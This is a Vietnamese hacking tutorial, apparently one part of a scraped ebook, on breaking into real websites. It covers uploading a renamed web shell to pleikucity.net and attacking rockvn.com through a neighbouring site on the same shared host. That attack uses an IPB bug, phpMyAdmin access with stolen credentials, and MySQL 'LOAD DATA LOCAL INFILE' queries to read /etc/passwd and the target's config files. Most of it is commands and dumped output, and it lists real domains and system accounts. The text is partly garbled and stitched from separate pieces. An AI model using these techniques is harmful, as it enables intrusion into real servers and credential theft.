Hacker Professional Ebook part 309 docx

Vêo lấy cái style rồi giao cho lão vns3curity gì đó thick lêm gì thì lêm .... vì mình đã đạt được mục đêch rồi!. © HcEgrOup.neT Thời gian: 5 phút cao thủ thì nhanh hơn Note: Đã report bu

Trang 1

hê hê ! Chênh hắn !

rename con c98 của mình lại thênh : misc.php up lên folder uploads của nó rồi open browser lên :

http://www.pleikucity.net/html/misc.php?xo e%5d= /uploads

Tèn ta rén tê ren ! Yao key đông you now hê hê ! Con nêy vẫn còn hạn chế up tiếp

1 con khác lên cho chắc ăn vê ta đã thấy owner lê pleiku/pleiku ! á ! Còn chờ gì nữa :d thực hiện lại các bước ban đầu Forgot pass

hê ! Vêo lấy cái style rồi giao cho lão vns3curity gì đó thick lêm gì thì lêm vì mình đã đạt được mục đêch rồi ! còn lão vns3curity lê kẻ thù của nó hê hê !

Kết Bêi : hãy tẪn dụng những gì mình nhìn thấy vê mục tiêu có

Vns3curity(HCE)

How i hacked rockvn.com

How to hack rockvn.com (Local attack)

by: black_hat_cr [at] VN FORCE Team © HcEgrOup.neT

Thời gian: 5 phút (cao thủ thì nhanh hơn)

Note: Đã report bug này chưa biết fix hay chưa, những ví dụ trong bài đã được fix, chỉ mang hình thức "chia sẽ" Do lần đầu tiên viết tutorial nên còn nhiều sai xót, hi vọng các bạn cho í kiến

Sơ lượt qua về rockvn.com

1, xài VB 3.5 < chưa có bug

2, server config kĩ và bật safe mode

3, server đặt ở digipower.vn, trên IP này có 16 site khác, 16 site đó là:

Code:

1 bigtoecrew.com

2 camtu.info

3 congtyweb.com

4 constrexim9.com

5 daikho.net

6 haanhtuan.net

7 haylam.com

8 kyniemthoigian.net

Trang 2

9 maitrang.net

10 mouoc.com

11 salsavietnam.com

12 showroomvn.com

13 tranphuonglinh.net

14 vietbboy.com

15 yenbairock.com

16 zukonvip.biz

mục tiêu là rockvn.com check thử thì "bàn đạp" của ta sẽ là bigtoecrew.com Đặc điểm về bigtoe là xài ipb 2.14 chưa hề fix bug search, search kĩ trong HCE sẽ thấy cách hack ok, 1 phút trôi qua, ok lấy được info của database đại khái là: Code:

$INFO['sql_pass'] = 'bigxxx'; //cái này viết vậy cho có hình thức !

và prefix là: ibf_

ok, bây giờ có 2 con đường

1, connect vào database qua con shell

2, connect vào database qua phpmyadmin mở ra, cái điểm sơ hở ở đây là đường dẫn vào là domain/phpmyadmin luôn hehe, như vậy ta login vào với user + pass có được tại:

Code:

http://bigtoecrew.com/phpmyadmin

Bắt đầu login successful ! hehe

Khi đã vào rồi thì vào "Query window" ở trên (bên phải) nó sẽ hiện ra 1 cái window nhỏ nhỏ khi đó ta chạy command này:

Code:

CREATE TABLE ibf_test(text LONGTEXT);

Bug mà chúng ta sẽ dùng để local ….sẽ chạy qua mysql với command:

Code:

load data local infile 'path/file' into table ibf_test FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '\'' LINES TERMINATED BY '\n';

Trang 3

okie, đã create table ibf_test Giờ ta hãy coi info trong /etc/passwd để biết thêm thông tin về victim xong run command này:

Code:

load data local infile '/etc/passwd' into table ibf_test FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '\'' LINES TERMINATED BY '\n';

Tiếp theo, export cái table ibf_test hoặc run command sau khi login vào database qua con shell với: SELECT * FROM ibf_test;

Code:

INSERT INTO `ibf_test` VALUES ('root:x:0:0:root:/root:/bin/bash');

INSERT INTO `ibf_test` VALUES ('bin:x:1:1:bin:/bin:/sbin/nologin');

INSERT INTO ìbf_test` VALUES ('daemon:x:2:2:daemon:/sbin:/sbin/nologin'); INSERT INTO ìbf_test` VALUES ('adm:x:3:4:adm:/var/adm:/sbin/nologin'); INSERT INTO ìbf_test` VALUES ('lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin'); INSERT INTO ìbf_test` VALUES ('sync:x:5:0:sync:/sbin:/bin/sync');

INSERT INTO `ibf_test` VALUES

('shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown');

INSERT INTO `ibf_test` VALUES ('halt:x:7:0:halt:/sbin:/sbin/halt');

('mail:x:8:12:mail:/var/spool/mail:/sbin/nologin');

INSERT INTO `ibf_test` VALUES ('news:x:9:13:news:/etc/news:');

('uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin');

INSERT INTO `ibf_test` VALUES ('operator:x:11:0:operator:/root:/sbin/nologin'); INSERT INTO `ibf_test` VALUES

('games:x:12:100:games:/usr/games:/sbin/nologin');

('gopher:x:13:30:gopher:/var/gopher:/sbin/nologin');

INSERT INTO ìbf_test` VALUES ('ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin'); INSERT INTO ìbf_test` VALUES ('nobody:x:99:99:Nobody:/:/sbin/nologin'); INSERT INTO ìbf_test` VALUES ('vcsa:x:69:69:virtual console memory

owner:/dev:/sbin/nologin');

('mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin');

('smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin');

Trang 4

('named:x:25:25:Named:/var/named:/sbin/nologin');

INSERT INTO `ibf_test` VALUES ('sshd:x:74:74:Privilege-separated

SSH:/var/empty/sshd:/sbin/nologin');

INSERT INTO `ibf_test` VALUES ('rpc:x:32:32:Portmapper RPC

user:/:/sbin/nologin');

INSERT INTO `ibf_test` VALUES ('rpm:x:37:37::/var/lib/rpm:/sbin/nologin'); INSERT INTO `ibf_test` VALUES

('apache:x:48:48:Apache:/var/www:/sbin/nologin');

('diradmin:x:100:101::/usr/local/directadmin:/bin/bash');

INSERT INTO `ibf_test` VALUES ('mysql:x:101:102:MySQL

server:/var/lib/mysql:/bin/bash');

('majordomo:x:102:2::/etc/virtual/majordomo:/bin/bash');

INSERT INTO ìbf_test` VALUES ('admin:x:500:500::/home/admin:/bin/bash'); INSERT INTO ìbf_test` VALUES ('rockvn:x:501:501::/home/rockvn:/bin/bash'); INSERT INTO ìbf_test` VALUES ('lthh:x:502:502::/home/lthh:/bin/bash');

INSERT INTO `ibf_test` VALUES ('gofl:x:503:503::/home/gofl:/bin/bash');

INSERT INTO ìbf_test` VALUES ('bigtoe:x:504:504::/home/bigtoe:/bin/bash'); INSERT INTO ìbf_test` VALUES ('digipro:x:505:505::/home/digipro:/bin/bash'); INSERT INTO ìbf_test` VALUES

('phanyly:x:506:506::/home/phanyly:/bin/bash');

INSERT INTO ìbf_test` VALUES ('cutu9:x:507:507::/home/cutu9:/bin/false'); INSERT INTO ìbf_test` VALUES ('david:x:508:508::/home/david:/bin/bash'); INSERT INTO ìbf_test` VALUES

('manhmeo:x:509:509::/home/manhmeo:/bin/bash');

('vmanagemt:x:510:510::/home/vmanagemt:/bin/bash');

INSERT INTO `ibf_test` VALUES ('yrc:x:511:511::/home/yrc:/bin/bash');

('haanhtuan:x:512:512::/home/haanhtuan:/bin/bash');

('constrexim:x:513:513::/home/constrexim:/bin/bash');

('maitrang:x:514:514::/home/maitrang:/bin/bash');

('phuonglinh:x:515:515::/home/phuonglinh:/bin/bash');

Trang 5

('ngocanh:x:500:500::/home/ngocanh:/bin/bash');

Okie, thành công mỹ mãn rồi, đây là 1 bug của mysql, gọi là “data local infile” thì fải (nếu nói sai, xin sửa giùm) ok, giờ, bước tiếp theo là lấy thông tin trong file config của mục tiêu (rockvn.com) … bây giờ run 1 command cũng gần giống khi mình lấy /etc/passwd và ở đây, path của rockvn (ở trên cho thấy) là: /home/rockvn

……uhm…biết là vậy nhưng mà cái này chỉ là ngòai thôi….giờ ta nhìn vào “bàn đạp” nó là:

Code:

/home/bigtoe/domains/bigtoecrew.com/public_html

Vậy thì của rockvn sẽ là:

Code:

/home/rockvn/domains/rockvn.com/public_html

Cái path rất là quan trọng, vì mình cần biết vị trị chính xác mới lấy được thông tin (file config) okie….ở đây, rockvn xài Vbulletin, do đó file config theo mặc định nó

sẽ nằm ở: /forum/includes/config.php… giờ thử lấy thông tin trong đó xem nào… Code:

load data local infile

'/home/rockvn/domains/rockvn.com/public_html/forum/includes/config.php' into table ibf_test FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '\'' LINES TERMINATED BY '\n';

……

Bum….file not found….ặc ặc….mình đã làm gì sai ? file not found ? thử lấy index.php xem sao…

Code:

load data local infile

'/home/rockvn/domains/rockvn.com/public_html/forum/index.php' into table

ibf_test FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '\''

LINES TERMINATED BY '\n';

Hiện ra source code ? mà file config trong includes không lấy được? như vậy là sao ? à à admin đổi tên file đó mà kekek…….theo 1 số kiến thức về Vbulletin thì file index.php của nó không hề include cái config hix hix….do đó, đọc code trong

Tiêu đề	How I Hacked Rockvn.com
Tác giả	Black_Hat_Cr
Trường học	HCE Group
Chuyên ngành	Hacking
Thể loại	Tutorial
Năm xuất bản	2023
Thành phố	Pleiku

Định dạng
Số trang	5
Dung lượng	128,07 KB